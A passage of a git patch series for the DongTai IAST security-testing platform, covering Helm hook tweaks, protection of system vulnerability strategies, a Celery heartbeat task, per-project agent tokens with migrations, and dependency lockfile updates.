}} namespace: {{.Release.Namespace}} annotations: "helm.sh/hook": pre-upgrade diff --git a/deploy/kubernetes/helm/values.yaml b/deploy/kubernetes/helm/values.yaml index 0fc2ba3a2..aa61d0066 100644 --- a/deploy/kubernetes/helm/values.yaml +++ b/deploy/kubernetes/helm/values.yaml @@ -55,7 +55,6 @@ storage: persistentVolumeClaim: iast-agent-pvc # or null(The agent needs to close the reporting log function 'dongtai.log.disable-collector: false') csrfTrustOrigins: .example.com -secretKey: vbjlvbxfvazjfprywuxgyclmvhtmselddsefxxlcixovmqfpgy smtp: server: smtp_server From 87cc6a12e8aaba8b393c9742680eb7ea614faf0a Mon Sep 17 00:00:00 2001 From: st1020 Date: Fri, 8 Sep 2023 11:58:32 +0800 Subject: [PATCH 069/114] feat: modify hook strategy update logic --- dongtai_web/serializers/strategy.py | 1 + dongtai_web/views/strategy_delete.py | 2 ++ dongtai_web/views/strategy_modified.py | 14 +++++--------- 3 files changed, 8 insertions(+), 9 deletions(-) diff --git a/dongtai_web/serializers/strategy.py b/dongtai_web/serializers/strategy.py index b52c7d45d..d3239b285 100644 --- a/dongtai_web/serializers/strategy.py +++ b/dongtai_web/serializers/strategy.py @@ -16,4 +16,5 @@ class Meta: "vul_name", "vul_desc", "dt", + "system_type", ] diff --git a/dongtai_web/views/strategy_delete.py b/dongtai_web/views/strategy_delete.py index 57d78c567..91ec46c71 100644 --- a/dongtai_web/views/strategy_delete.py +++ b/dongtai_web/views/strategy_delete.py @@ -33,6 +33,8 @@ def delete(self, request, id_: int): strategy = IastStrategyModel.objects.filter(pk=id_).first() if not strategy: return R.failure(msg=_("This strategy does not exist")) + if strategy.system_type == 1: + return R.failure(msg="Can not delete system strategy") hook_types = HookType.objects.filter(vul_strategy=strategy).all() strategy.state = DELETE strategy.save() diff --git a/dongtai_web/views/strategy_modified.py b/dongtai_web/views/strategy_modified.py index 201b08485..c7ca09799 100644 --- a/dongtai_web/views/strategy_modified.py +++ b/dongtai_web/views/strategy_modified.py @@ -40,18 +40,14 @@ def put(self, request, id_): strategy = IastStrategyModel.objects.filter(pk=id_).first() if not strategy: return R.failure() - _update(strategy, data) + for k, v in data.items(): + if k in {"vul_name", "vul_type"} and strategy.system_type == 1: + continue + setattr(strategy, k, v) + strategy.save() HookType.objects.filter(vul_strategy=strategy, type=4).update(name=data["vul_name"]) HookType.objects.filter(vul_strategy=strategy, type=3).update(name=data["vul_name"]) return R.success(data={"id": id_}) - # hook_type=hook_type.id).first() - # if strategy: - - -def _update(model, dic): - for k, v in dic.items(): - setattr(model, k, v) - model.save() def get_model_field(model, exclude=None, include=None): From 9a59410c94fd8bdf45a5550c361b812d87750507 Mon Sep 17 00:00:00 2001 From: tscuite Date: Fri, 8 Sep 2023 12:03:07 +0800 Subject: [PATCH 070/114] feat: update ci --- deploy/kubernetes/helm/templates/job/dongtai_update.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/deploy/kubernetes/helm/templates/job/dongtai_update.yaml b/deploy/kubernetes/helm/templates/job/dongtai_update.yaml index daa003a14..327c87064 100644 --- a/deploy/kubernetes/helm/templates/job/dongtai_update.yaml +++ b/deploy/kubernetes/helm/templates/job/dongtai_update.yaml @@ -4,7 +4,7 @@ apiVersion: batch/v1 kind: Job metadata: - name: {{ template "dongtai.fullname" . }}-update-{{ randAlphaNum 10 }} + name: {{ template "dongtai.fullname" . }}-update-{{ randNumeric 10 }} namespace: {{.Release.Namespace}} annotations: "helm.sh/hook": pre-upgrade From c95a3027d2d82d5862ba8e3e49fc8922d22fc927 Mon Sep 17 00:00:00 2001 From: st1020 Date: Fri, 8 Sep 2023 12:12:16 +0800 Subject: [PATCH 071/114] feat: modify hook strategy update logic --- dongtai_web/views/engine_hook_rule_add.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/dongtai_web/views/engine_hook_rule_add.py b/dongtai_web/views/engine_hook_rule_add.py index 24c1cf535..db2c9b275 100644 --- a/dongtai_web/views/engine_hook_rule_add.py +++ b/dongtai_web/views/engine_hook_rule_add.py @@ -230,7 +230,7 @@ def post(self, request): else ser.validated_data["type"] ) - if IastStrategyModel.objects.filter( + if HookStrategy.objects.filter( language_id=ser.validated_data["language_id"], type=type_, value=rule_value ).exists(): return R.failure(msg="Already exists same rule") From 28a64ad762cdef61a7a9d941af9edc25d11a44e8 Mon Sep 17 00:00:00 2001 From: st1020 Date: Fri, 8 Sep 2023 12:15:24 +0800 Subject: [PATCH 072/114] feat: modify hook strategy update logic --- dongtai_web/views/engine_hook_rule_modify.py | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) diff --git a/dongtai_web/views/engine_hook_rule_modify.py b/dongtai_web/views/engine_hook_rule_modify.py index 033232cdc..a82862678 100644 --- a/dongtai_web/views/engine_hook_rule_modify.py +++ b/dongtai_web/views/engine_hook_rule_modify.py @@ -149,9 +149,7 @@ def post(self, request): return R.failure(msg=_("No such hookstrategy.")) if strategy.system_type: return R.failure(msg="Can not modify preset rule") - if IastStrategyModel.objects.filter( - language_id=strategy.language_id, type=strategy.type, value=rule_value - ).exists(): + if HookStrategy.objects.filter(language_id=strategy.language_id, type=strategy.type, value=rule_value).exists(): return R.failure(msg="Already exists same rule") if strategy.type == 4: From cd6b12a251184b7f0b8a3e9d8dd5ba1817689f64 Mon Sep 17 00:00:00 2001 From: tscuite Date: Fri, 8 Sep 2023 14:03:57 +0800 Subject: [PATCH 073/114] feat: update ci --- deploy/kubernetes/helm/templates/job/dongtai_update.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/deploy/kubernetes/helm/templates/job/dongtai_update.yaml b/deploy/kubernetes/helm/templates/job/dongtai_update.yaml index 327c87064..a6ba55060 100644 --- a/deploy/kubernetes/helm/templates/job/dongtai_update.yaml +++ b/deploy/kubernetes/helm/templates/job/dongtai_update.yaml @@ -7,6 +7,7 @@ metadata: name: {{ template "dongtai.fullname" . }}-update-{{ randNumeric 10 }} namespace: {{.Release.Namespace}} annotations: + "helm.sh/hook-delete-policy": before-hook-creation,hook-succeeded "helm.sh/hook": pre-upgrade "helm.sh/hook-weight": "-5" kubesphere.io/description: {{ template "dongtai.fullname" . }}-update From c9ce36ce35417f941174e0b1279482295bbab8d9 Mon Sep 17 00:00:00 2001 From: tscuite Date: Fri, 8 Sep 2023 15:05:27 +0800 Subject: [PATCH 074/114] feat: update ci --- deploy/kubernetes/helm/templates/job/dongtai_update.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/deploy/kubernetes/helm/templates/job/dongtai_update.yaml b/deploy/kubernetes/helm/templates/job/dongtai_update.yaml index a6ba55060..103c5f636 100644 --- a/deploy/kubernetes/helm/templates/job/dongtai_update.yaml +++ b/deploy/kubernetes/helm/templates/job/dongtai_update.yaml @@ -7,7 +7,9 @@ metadata: name: {{ template "dongtai.fullname" . }}-update-{{ randNumeric 10 }} namespace: {{.Release.Namespace}} annotations: + {{- if not .Values.develop.dev }} "helm.sh/hook-delete-policy": before-hook-creation,hook-succeeded + {{ - end }} "helm.sh/hook": pre-upgrade "helm.sh/hook-weight": "-5" kubesphere.io/description: {{ template "dongtai.fullname" . }}-update From 773dbc4be8527e926047c531cc7d4476fbe056dd Mon Sep 17 00:00:00 2001 From: tscuite Date: Fri, 8 Sep 2023 15:22:42 +0800 Subject: [PATCH 075/114] feat: update ci --- deploy/kubernetes/helm/templates/job/dongtai_update.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/deploy/kubernetes/helm/templates/job/dongtai_update.yaml b/deploy/kubernetes/helm/templates/job/dongtai_update.yaml index 103c5f636..01b94945d 100644 --- a/deploy/kubernetes/helm/templates/job/dongtai_update.yaml +++ b/deploy/kubernetes/helm/templates/job/dongtai_update.yaml @@ -9,7 +9,7 @@ metadata: annotations: {{- if not .Values.develop.dev }} "helm.sh/hook-delete-policy": before-hook-creation,hook-succeeded - {{ - end }} + {{- end }} "helm.sh/hook": pre-upgrade "helm.sh/hook-weight": "-5" kubesphere.io/description: {{ template "dongtai.fullname" . }}-update From a2d170be3c6d2b8603a54f445dfd2de9c0ff5691 Mon Sep 17 00:00:00 2001 From: st1020 Date: Mon, 11 Sep 2023 12:22:03 +0800 Subject: [PATCH 076/114] feat: heartbeat use celery task --- .../report/handler/heartbeat_handler.py | 15 +++++++++++---- 1 file changed, 11 insertions(+), 4 deletions(-) diff --git a/dongtai_protocol/report/handler/heartbeat_handler.py b/dongtai_protocol/report/handler/heartbeat_handler.py index af1586bdf..a8c9f95eb 100644 --- a/dongtai_protocol/report/handler/heartbeat_handler.py +++ b/dongtai_protocol/report/handler/heartbeat_handler.py @@ -2,7 +2,9 @@ # datetime:2020/10/23 11:56 import logging import time +from typing import Any +from celery import shared_task from django.core.cache import cache from django.db.models import Q, QuerySet from django.utils.translation import gettext_lazy as _ @@ -29,6 +31,12 @@ def check_agent_incache(agent_id): return bool(cache.get(f"heartbeat-{agent_id}")) +@shared_task +def update_heartbeat(agent_id: int, defaults: dict[str, Any]): + IastHeartbeat.objects.update_or_create(agent_id=agent_id, defaults=defaults) + IastAgent.objects.update_or_create(pk=agent_id, defaults={"is_running": 1, "online": 1}) + + @ReportHandler.register(const.REPORT_HEART_BEAT) class HeartBeatHandler(IReportHandler): def __init__(self): @@ -59,8 +67,7 @@ def has_permission(self): def save_heartbeat(self): default_dict = {"dt": int(time.time())} if not check_agent_incache(self.agent_id): - IastHeartbeat.objects.update_or_create(agent_id=self.agent_id, defaults=default_dict) - IastAgent.objects.update_or_create(pk=self.agent_id, defaults={"is_running": 1, "online": 1}) + update_heartbeat.delay(agent_id=self.agent_id, defaults=default_dict) if self.return_queue == 1: default_dict["req_count"] = self.req_count default_dict["report_queue"] = self.report_queue @@ -72,7 +79,7 @@ def save_heartbeat(self): default_dict["memory"] = self.memory default_dict["cpu"] = self.cpu default_dict["disk"] = self.disk - IastHeartbeat.objects.update_or_create(agent_id=self.agent_id, defaults=default_dict) + update_heartbeat.delay(agent_id=self.agent_id, defaults=default_dict) else: default_dict["memory"] = self.memory default_dict["cpu"] = self.cpu @@ -81,7 +88,7 @@ def save_heartbeat(self): default_dict["method_queue"] = self.method_queue default_dict["replay_queue"] = self.replay_queue default_dict["disk"] = self.disk - IastHeartbeat.objects.update_or_create(agent_id=self.agent_id, defaults=default_dict) + update_heartbeat.delay(agent_id=self.agent_id, defaults=default_dict) update_agent_cache(self.agent_id, default_dict) def get_result(self, msg=None): From 9aaa4f97ebe91c9982ad296c538ba226808e2e43 Mon Sep 17 00:00:00 2001 From: st1020 Date: Mon, 11 Sep 2023 12:30:09 +0800 Subject: [PATCH 077/114] fix: save vul did not save uri --- dongtai_engine/signals/handlers/vul_handler.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/dongtai_engine/signals/handlers/vul_handler.py b/dongtai_engine/signals/handlers/vul_handler.py index 9e78a7ca2..7da4e670f 100644 --- a/dongtai_engine/signals/handlers/vul_handler.py +++ b/dongtai_engine/signals/handlers/vul_handler.py @@ -296,7 +296,6 @@ def save_vul(vul_meta, vul_level, strategy_id, vul_stack, top_stack, bottom_stac if vul: vul.url = vul_meta.url vul.uri = vul_meta.uri - vul.pattern_uri = pattern_uri vul.req_header = vul_meta.req_header vul.req_params = vul_meta.req_params vul.req_data = vul_meta.req_data @@ -317,6 +316,7 @@ def save_vul(vul_meta, vul_level, strategy_id, vul_stack, top_stack, bottom_stac vul.save( update_fields=[ "url", + "uri", "req_header", "req_params", "req_data", From 293ad3a221462460aaa7c8f5fe4ef49cda10d02b Mon Sep 17 00:00:00 2001 From: bidaya0 Date: Mon, 11 Sep 2023 14:47:05 +0800 Subject: [PATCH 078/114] feat: add project token --- dongtai_common/common/utils/__init__.py | 36 +++++++++++++++++++ .../migrations/0022_iastproject_token.py | 36 +++++++++++++++++++ dongtai_common/models/project.py | 3 ++ dongtai_common/models/user.py | 1 + dongtai_protocol/views/agent_register.py | 3 +- dongtai_web/urls.py | 2 ++ dongtai_web/views/project_token.py | 24 +++++++++++++ 7 files changed, 104 insertions(+), 1 deletion(-) create mode 100644 dongtai_common/migrations/0022_iastproject_token.py create mode 100644 dongtai_web/views/project_token.py diff --git a/dongtai_common/common/utils/__init__.py b/dongtai_common/common/utils/__init__.py index 78703b80e..6b2561ab7 100644 --- a/dongtai_common/common/utils/__init__.py +++ b/dongtai_common/common/utils/__init__.py @@ -159,3 +159,39 @@ def authenticate(self, request): return None token = auth.lower().replace(self.keyword.lower().encode(), b"", 1).decode() return self.auth_decodedenticate_credentials(token) + + +@cached_decorator(random_range=(60, 120), use_celery_update=False) +def get_user_from_project_key(key): + from dongtai_common.models.project import IastProject + from dongtai_common.models.user import User + + project = IastProject.objects.get(token=key) + principal = User.objects.filter(pk=project.user_id).first() + user = principal if principal else User.objects.filter(pk=1).first() + user.using_project = project + return user + + +class ProjectTokenAuthentication(TokenAuthentication): + keyword = "Token PROJECT" + model = None + + def auth_decodedenticate_credentials(self, key): + from rest_framework import exceptions + + from dongtai_common.models.project import IastProject + + try: + warnings.warn("Department token is departured. Please use new token to register agent.", stacklevel=1) + user = get_user_from_project_key(key) + except IastProject.DoesNotExist as e: + raise exceptions.AuthenticationFailed(_("Invalid token.")) from e + return (user, key) + + def authenticate(self, request): + auth = get_authorization_header(request) + if not auth or not auth.lower().startswith(self.keyword.lower().encode()): + return None + token = auth.lower().replace(self.keyword.lower().encode(), b"", 1).decode() + return self.auth_decodedenticate_credentials(token) diff --git a/dongtai_common/migrations/0022_iastproject_token.py b/dongtai_common/migrations/0022_iastproject_token.py new file mode 100644 index 000000000..66f86888b --- /dev/null +++ b/dongtai_common/migrations/0022_iastproject_token.py @@ -0,0 +1,36 @@ +# Generated by Django 3.2.20 on 2023-09-11 14:16 + +from django.db import migrations +import shortuuid.django_fields +from shortuuid import ShortUUID + + +def update_exist_project_token(apps, schema_editor): + IastProject = apps.get_model("dongtai_common", "IastProject") + objs_list = [] + for project in IastProject.objects.all(): + project.token = ShortUUID(alphabet="abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789").random( + length=22 + ) + objs_list.append(project) + IastProject.objects.bulk_update(objs_list, ["token"]) + + +class Migration(migrations.Migration): + dependencies = [ + ("dongtai_common", "0021_iastwebhooklog"), + ] + + operations = [ + migrations.AddField( + model_name="iastproject", + name="token", + field=shortuuid.django_fields.ShortUUIDField( + alphabet="abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789", + length=22, + max_length=22, + prefix="", + ), + ), + migrations.RunPython(update_exist_project_token), + ] diff --git a/dongtai_common/models/project.py b/dongtai_common/models/project.py index b54e4469d..8efedfe26 100644 --- a/dongtai_common/models/project.py +++ b/dongtai_common/models/project.py @@ -9,6 +9,8 @@ from dongtai_common.models.strategy_user import IastStrategyUser from dongtai_common.utils.db import get_timestamp from dongtai_common.utils.settings import get_managed +from shortuuid.django_fields import ShortUUIDField +import string class VulValidation(models.IntegerChoices): @@ -79,6 +81,7 @@ class IastProject(models.Model): status = models.IntegerField(default=0, choices=ProjectStatus.choices) projectgroups = models.ManyToManyField("IastProjectGroup", through="IastProjectGroupProject") users = models.ManyToManyField("User", through="IastProjectUser", related_name="auth_projects") + token = ShortUUIDField(max_length=22, alphabet=string.ascii_letters + string.digits) class Meta: managed = get_managed() diff --git a/dongtai_common/models/user.py b/dongtai_common/models/user.py index 30cf92f27..25428255b 100644 --- a/dongtai_common/models/user.py +++ b/dongtai_common/models/user.py @@ -71,6 +71,7 @@ class User(AbstractUser, PermissionsMixin): objects = SaaSUserManager() using_department = None + using_project = None class Meta(AbstractUser.Meta): db_table = "auth_user" diff --git a/dongtai_protocol/views/agent_register.py b/dongtai_protocol/views/agent_register.py index dcb1a2e71..94923c3a5 100644 --- a/dongtai_protocol/views/agent_register.py +++ b/dongtai_protocol/views/agent_register.py @@ -265,7 +265,8 @@ def post(self, request: Request): } default_params.update(template.to_full_project_args() if template else {}) - + if request.user.using_project is not None: + project_name = request.user.using_project.name with transaction.atomic(): ( obj, diff --git a/dongtai_web/urls.py b/dongtai_web/urls.py index 9799f2221..997e4e15f 100644 --- a/dongtai_web/urls.py +++ b/dongtai_web/urls.py @@ -125,6 +125,7 @@ from dongtai_web.vul_log.vul_log_view import VulLogViewSet from dongtai_web.vul_recheck_payload.vul_recheck_payload import VulReCheckPayloadViewSet from static.i18n.views.setlang import LanguageSetting +from dongtai_web.views.project_token import ProjectToken urlpatterns: list[URLResolver | URLPattern] = [ path("user/", UserDetailEndPoint.as_view()), @@ -137,6 +138,7 @@ path("user/password/reset", UserPasswordReset.as_view()), path("captcha/", include("captcha.urls")), path(r"captcha/refresh", CaptchaCreate.as_view()), + path("project//token", ProjectToken.as_view()), path("project/", ProjectDetail.as_view()), path("project/add", ProjectAdd.as_view()), path("project/delete", ProjectDel.as_view()), diff --git a/dongtai_web/views/project_token.py b/dongtai_web/views/project_token.py new file mode 100644 index 000000000..04a687f28 --- /dev/null +++ b/dongtai_web/views/project_token.py @@ -0,0 +1,24 @@ +from django.utils.translation import gettext_lazy as _ + +from dongtai_common.endpoint import R, UserEndPoint +from dongtai_web.utils import extend_schema_with_envcheck + + +class ProjectToken(UserEndPoint): + @extend_schema_with_envcheck( + tags=[_("Project")], + summary=_("Projects Token"), + description=_( + "Get project information by project id, including the current version information of the project." + ), + ) + def get(self, request, pk): + project = request.user.get_projects().filter(pk=pk).first() + if project: + return R.success( + data={ + "id": project.id, + "token": project.token, + } + ) + return R.failure(status=203, msg=_("no permission")) From 5a62e328a8c957bff9d1a1847dd5d3de2048b228 Mon Sep 17 00:00:00 2001 From: bidaya0 Date: Mon, 11 Sep 2023 14:49:01 +0800 Subject: [PATCH 079/114] feat: add project token --- dongtai_conf/settings.py | 1 + 1 file changed, 1 insertion(+) diff --git a/dongtai_conf/settings.py b/dongtai_conf/settings.py index 28159e59f..ff8aa7f8a 100644 --- a/dongtai_conf/settings.py +++ b/dongtai_conf/settings.py @@ -121,6 +121,7 @@ def get_installed_apps(): "DEFAULT_AUTHENTICATION_CLASSES": [ "rest_framework.authentication.SessionAuthentication", "dongtai_common.common.utils.DepartmentTokenAuthentication", + "dongtai_common.common.utils.ProjectTokenAuthentication", "rest_framework.authentication.TokenAuthentication", ], "DEFAULT_RENDERER_CLASSES": [ From 5765508987aab5b23e6a5b29ac2cfc35575d2196 Mon Sep 17 00:00:00 2001 From: bidaya0 Date: Mon, 11 Sep 2023 14:50:58 +0800 Subject: [PATCH 080/114] feat: add project token --- dongtai_common/migrations/0022_iastproject_token.py | 2 +- dongtai_common/models/project.py | 4 ++-- dongtai_web/urls.py | 2 +- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/dongtai_common/migrations/0022_iastproject_token.py b/dongtai_common/migrations/0022_iastproject_token.py index 66f86888b..20083d2e7 100644 --- a/dongtai_common/migrations/0022_iastproject_token.py +++ b/dongtai_common/migrations/0022_iastproject_token.py @@ -1,7 +1,7 @@ # Generated by Django 3.2.20 on 2023-09-11 14:16 -from django.db import migrations import shortuuid.django_fields +from django.db import migrations from shortuuid import ShortUUID diff --git a/dongtai_common/models/project.py b/dongtai_common/models/project.py index 8efedfe26..ddfbc87a8 100644 --- a/dongtai_common/models/project.py +++ b/dongtai_common/models/project.py @@ -1,16 +1,16 @@ #!/usr/bin/env python # datetime:2020/11/30 下午5:32 +import string import time from django.db import models +from shortuuid.django_fields import ShortUUIDField from dongtai_common.models import User from dongtai_common.models.department import Department from dongtai_common.models.strategy_user import IastStrategyUser from dongtai_common.utils.db import get_timestamp from dongtai_common.utils.settings import get_managed -from shortuuid.django_fields import ShortUUIDField -import string class VulValidation(models.IntegerChoices): diff --git a/dongtai_web/urls.py b/dongtai_web/urls.py index 997e4e15f..2359b7259 100644 --- a/dongtai_web/urls.py +++ b/dongtai_web/urls.py @@ -74,6 +74,7 @@ from dongtai_web.views.project_engines import ProjectEngines from dongtai_web.views.project_search import ProjectSearch from dongtai_web.views.project_summary import ProjectSummary +from dongtai_web.views.project_token import ProjectToken from dongtai_web.views.project_version_add import ProjectVersionAdd from dongtai_web.views.project_version_current import ProjectVersionCurrent from dongtai_web.views.project_version_delete import ProjectVersionDelete @@ -125,7 +126,6 @@ from dongtai_web.vul_log.vul_log_view import VulLogViewSet from dongtai_web.vul_recheck_payload.vul_recheck_payload import VulReCheckPayloadViewSet from static.i18n.views.setlang import LanguageSetting -from dongtai_web.views.project_token import ProjectToken urlpatterns: list[URLResolver | URLPattern] = [ path("user/", UserDetailEndPoint.as_view()), From e2115375e8b8d304b2e12cd1f6db60f5482340f9 Mon Sep 17 00:00:00 2001 From: bidaya0 Date: Mon, 11 Sep 2023 16:12:50 +0800 Subject: [PATCH 081/114] feat: add project token --- dongtai_protocol/views/agent_register.py | 7 +++++++ 1 file changed, 7 insertions(+) diff --git a/dongtai_protocol/views/agent_register.py b/dongtai_protocol/views/agent_register.py index 94923c3a5..7a3da7532 100644 --- a/dongtai_protocol/views/agent_register.py +++ b/dongtai_protocol/views/agent_register.py @@ -20,10 +20,16 @@ from dongtai_common.utils.request_type import Request from dongtai_protocol.api_schema import DongTaiParameter from dongtai_protocol.decrypter import parse_data +from shortuuid import ShortUUID +import string logger = logging.getLogger("dongtai.openapi") +def generate_shoutuuid() -> str: + return ShortUUID(alphabet=string.ascii_letters + string.digits).random(length=22) + + def get_agent_allow_report(agent_id): return 1 @@ -262,6 +268,7 @@ def post(self, request: Request): "template_id": template.id if template else -1, "user": user, "department_id": 1, + "token": generate_shoutuuid(), } default_params.update(template.to_full_project_args() if template else {}) From 5f81a21398324a0fde4122b42de15abf9e889c30 Mon Sep 17 00:00:00 2001 From: bidaya0 Date: Mon, 11 Sep 2023 16:14:05 +0800 Subject: [PATCH 082/114] feat: add project token --- dongtai_protocol/views/agent_register.py | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/dongtai_protocol/views/agent_register.py b/dongtai_protocol/views/agent_register.py index 7a3da7532..0e094e8bf 100644 --- a/dongtai_protocol/views/agent_register.py +++ b/dongtai_protocol/views/agent_register.py @@ -3,11 +3,13 @@ import base64 import json import logging +import string import time from django.db import transaction from django.utils.translation import gettext_lazy as _ from drf_spectacular.utils import extend_schema +from shortuuid import ShortUUID from dongtai_common.endpoint import OpenApiEndPoint, R from dongtai_common.models.agent import IastAgent @@ -20,8 +22,6 @@ from dongtai_common.utils.request_type import Request from dongtai_protocol.api_schema import DongTaiParameter from dongtai_protocol.decrypter import parse_data -from shortuuid import ShortUUID -import string logger = logging.getLogger("dongtai.openapi") From c29d92bab42ebfdbfe10364c082cea3d52a11b76 Mon Sep 17 00:00:00 2001 From: bidaya0 Date: Tue, 12 Sep 2023 17:24:30 +0800 Subject: [PATCH 083/114] feat: add new migration --- .../migrations/0023_auto_20230912_1211.py | 19 +++++++++++++++++++ dongtai_common/models/request_chains.py | 1 + 2 files changed, 20 insertions(+) create mode 100644 dongtai_common/migrations/0023_auto_20230912_1211.py diff --git a/dongtai_common/migrations/0023_auto_20230912_1211.py b/dongtai_common/migrations/0023_auto_20230912_1211.py new file mode 100644 index 000000000..51ad04ee8 --- /dev/null +++ b/dongtai_common/migrations/0023_auto_20230912_1211.py @@ -0,0 +1,19 @@ +# Generated by Django 3.2.20 on 2023-09-12 12:11 + +from django.conf import settings +from django.db import migrations, models +import django.db.models.deletion + + +class Migration(migrations.Migration): + dependencies = [ + ("dongtai_common", "0022_iastproject_token"), + ] + + operations = [ + migrations.AddField( + model_name="iastagentrequestchainstopographvec", + name="expandable", + field=models.BooleanField(default=False), + ), + ] diff --git a/dongtai_common/models/request_chains.py b/dongtai_common/models/request_chains.py index fc2ffda43..fc1074fde 100644 --- a/dongtai_common/models/request_chains.py +++ b/dongtai_common/models/request_chains.py @@ -139,6 +139,7 @@ class IastAgentRequestChainsTopoGraphVec(models.Model): max_length=255, blank=True, ) + expandable = models.BooleanField(default=False) class Meta: managed = get_managed() From e1a7c8e83b2d56d84a9a4bb9634c5e5907405245 Mon Sep 17 00:00:00 2001 From: bidaya0 Date: Tue, 12 Sep 2023 17:26:01 +0800 Subject: [PATCH 084/114] feat: add new migration --- dongtai_common/migrations/0023_auto_20230912_1211.py | 2 -- 1 file changed, 2 deletions(-) diff --git a/dongtai_common/migrations/0023_auto_20230912_1211.py b/dongtai_common/migrations/0023_auto_20230912_1211.py index 51ad04ee8..c330dfd3e 100644 --- a/dongtai_common/migrations/0023_auto_20230912_1211.py +++ b/dongtai_common/migrations/0023_auto_20230912_1211.py @@ -1,8 +1,6 @@ # Generated by Django 3.2.20 on 2023-09-12 12:11 -from django.conf import settings from django.db import migrations, models -import django.db.models.deletion class Migration(migrations.Migration): From 1a44f8b26afd17a3f717bcf452ec668182e34735 Mon Sep 17 00:00:00 2001 From: bidaya0 Date: Tue, 12 Sep 2023 17:47:30 +0800 Subject: [PATCH 085/114] fix: memory usage. --- dongtai_common/engine/vul_engine.py | 1 - 1 file changed, 1 deletion(-) diff --git a/dongtai_common/engine/vul_engine.py b/dongtai_common/engine/vul_engine.py index 8382b990f..643da6d26 100644 --- a/dongtai_common/engine/vul_engine.py +++ b/dongtai_common/engine/vul_engine.py @@ -1,6 +1,5 @@ #!/usr/bin/env python # datetime: 2021/7/21 下午7:07 -import copy import logging from collections import defaultdict From 2e32e82b9217d4af555d7869b427075caf83c36f Mon Sep 17 00:00:00 2001 From: bidaya0 Date: Tue, 12 Sep 2023 18:10:53 +0800 Subject: [PATCH 086/114] dep: add new migration --- Pipfile | 1 + Pipfile.lock | 113 ++++++++++++++++++--------------------------------- 2 files changed, 40 insertions(+), 74 deletions(-) diff --git a/Pipfile b/Pipfile index 75132e917..cefe1eecf 100644 --- a/Pipfile +++ b/Pipfile @@ -92,6 +92,7 @@ django-prometheus = "==2.3.1" django-add-default-value = "==0.10.0" networkx = {extras = ["all"], version = "*"} pandas = "~=2.1.0" +pydot = "*" [dev-packages] diff --git a/Pipfile.lock b/Pipfile.lock index 1d75b0e12..060ae6fcc 100644 --- a/Pipfile.lock +++ b/Pipfile.lock @@ -1,7 +1,7 @@ { "_meta": { "hash": { - "sha256": "a6fdf2b597cdada21055c164b389c0ed3ca3d8d752f37d61e24f06757bca5f1d" + "sha256": "0588445f29e048a73e3a01d5782635221139f8104574105521a44163db44e6f7" }, "pipfile-spec": 6, "requires": { @@ -30,10 +30,10 @@ }, "aliyun-python-sdk-kms": { "hashes": [ - "sha256:9bc39c693ba83944f5dfb871b118a2925eb8a5ee214dfcce61ee2ea3b6317ef1", - "sha256:a372737715682014bace68bd40fe83332f4fd925009a3eb110d41bc66f270e7a" + "sha256:83166468817a4fbc4c958af43ec22856e1bd80f1363f56acf822206febe6b059", + "sha256:f87234a8b64d457ca2338f87650db18a3ce7f7dbc9bfef71efe8f2894aded3d6" ], - "version": "==2.16.1" + "version": "==2.16.2" }, "amqp": { "hashes": [ @@ -49,7 +49,6 @@ "sha256:9e0ce3aa93a819ba5b45120216b23878cf6e8525eb3848653452b4192b92afed" ], "index": "pypi", - "markers": "python_version >= '3.7'", "version": "==3.7.2" }, "async-timeout": { @@ -90,17 +89,15 @@ "sha256:a50b4323f9579cfe22fcf5531fbd40b567d4d74c1adce06aeb5c95fce2a6fb40" ], "index": "pypi", - "markers": "python_version >= '3.7'", "version": "==1.24.59" }, "boto3-stubs": { "hashes": [ - "sha256:76079a82f199087319762c931f13506e02129132e80257dab0888d3da7dc11c7", - "sha256:bd1d1cbdcbf18902a090d4a746cdecef2a7ebe31cf9a474bbe407d57eaa79a6a" + "sha256:5ea7ca5ef2f9f66d35ed118b0bbc5db8a2dba7c40a35a7cd3da1698b3ba4c728", + "sha256:d301eef7571053ffcab26b822fdb6a6a8d03c0896b12bafd44d0ed2df952ab46" ], "index": "pypi", - "markers": "python_version >= '3.7'", - "version": "==1.28.40" + "version": "==1.28.45" }, "botocore": { "hashes": [ @@ -108,17 +105,15 @@ "sha256:c8fac203a391cc2e4b682877bfce70e723e33c529b35b399a1d574605fbeb1af" ], "index": "pypi", - "markers": "python_version >= '3.7'", "version": "==1.27.91" }, "botocore-stubs": { "hashes": [ - "sha256:2001a253daf4ae2e171e6137b9982a00a7fbfc7a53449a16856dc049e7cd5214", - "sha256:aab534d7e7949cd543bc9b2fadc1a36712033cb00e6f31e2475eefe8486d19ae" + "sha256:05775849ec4d1c5c489bd27d94d4e577408b24125ac460839a409b1401eb5869", + "sha256:9036f753cfce92111206401a7e73874576fcd8f6690e9c161a4ce5ccce9da8f2" ], "index": "pypi", - "markers": "python_version >= '3.7' and python_version < '4.0'", - "version": "==1.31.40" + "version": "==1.31.45" }, "celery": { "hashes": [ @@ -126,7 +121,6 @@ "sha256:3afa81e7c6393097a4079badc11117ac20a1bf145c92ae5f1cc3ed24c2b1f165" ], "index": "pypi", - "markers": "python_version >= '3.7'", "version": "==5.3.0rc1" }, "celery-singleton": { @@ -135,7 +129,6 @@ "sha256:76b30a1bbe31d42030924b3eecfcaae2ab3ab99bf43e607cd46437f012434420" ], "index": "pypi", - "markers": "python_version >= '3.6' and python_version < '4.0'", "version": "==0.3.1" }, "certifi": { @@ -144,7 +137,6 @@ "sha256:92d6037539857d8206b8f6ae472e8b77db8058fec5937a1ef3f54304089edbb9" ], "index": "pypi", - "markers": "python_version >= '3.6'", "version": "==2023.7.22" }, "cffi": { @@ -223,7 +215,6 @@ "sha256:e1cf59446890a00105fe7b7912492ea04b6e6f06d4b742b2c788469e34c82970" ], "index": "pypi", - "markers": "python_version >= '3.7'", "version": "==5.2.0" }, "charset-normalizer": { @@ -374,17 +365,15 @@ 